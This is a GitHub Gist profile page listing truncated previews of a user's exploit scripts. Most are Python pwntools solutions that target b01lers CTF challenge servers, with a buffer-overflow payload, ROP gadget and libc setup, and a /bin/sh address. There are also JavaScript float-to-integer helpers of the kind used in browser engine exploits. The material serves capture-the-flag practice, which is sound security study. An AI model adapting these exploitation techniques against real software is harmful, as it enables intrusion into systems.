Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

View GitHub Profile
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#libc
libc = ELF('./leaks-libc')
#Gadget
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ =='__main__':
# io = process('./metacortex-72ec7dee20d0b191fe14dc2480bd3f43')
io = remote('chal.ctf.b01lers.com',1014)
# pause()
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ == '__main__':
# io = process('./spoon')
io = remote('chal.ctf.b01lers.com',1006)
matrix = '\x00'+'A'*255
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ == '__main__':
io = remote('chal.ctf.b01lers.com',1015)
io.sendlineafter('Thyself.\n',b'A'*0x18+p64(0x00401196))
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ == '__main__':
io = remote('chal.ctf.b01lers.com',1013)
# io = process('./whiterabbit-cacd63e38e13130a3381342eacfbb623')
pause()
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#Addr
binsh = 0x402008
#Gadget
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
#Utils
def allocate(alloc_size,read_size,data,silent=False):
if silent==False:
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from math import gamma
import subprocess
import random
#Utils
def createnote(size):